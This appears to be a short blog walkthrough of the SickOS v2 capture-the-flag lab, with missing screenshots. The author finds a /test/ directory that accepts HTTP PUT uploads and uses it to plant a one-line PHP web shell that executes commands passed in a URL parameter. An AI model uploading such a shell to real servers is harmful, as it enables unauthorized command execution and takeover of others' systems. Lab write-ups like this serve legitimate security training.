Wednesday, 1 June 2016

SickOS v2 challnege

Looking for our target

OK, out target has assigned IP address.


Good, I prefer begin pentesting form web application.

The above picture is a default page. Source code contain only information that this picture is named blow.jpg. I have run dirbuster and

The /test/ directory is empty, and index.php contains the blow.jpg picture. I haven't found exploits to lighttp and OpenSSH. Hmmm, /test/ directory looks interesting but at first glance it is nothing special. In the meantime I downloaded the blow.jpg picture and I was looking for some sensitive informtion hardcodened into pic - without success.
I have tried PUT some script like a phpinfo and SUCCESS!!!

click on test.php and

Great! We have got following result because our test.php
<?php phpinfo(); ?>
It is our opportunity to upload reverse shell
I have uploaded out reverse shell script and named as shell1.php
<?php echo exec($_GET['cmd']); ?>
and let's try execute id command on shell

Excellent! We have got limited shell via web browser. It's not comfortable for me. I am going to try achieve limited shell in some other way.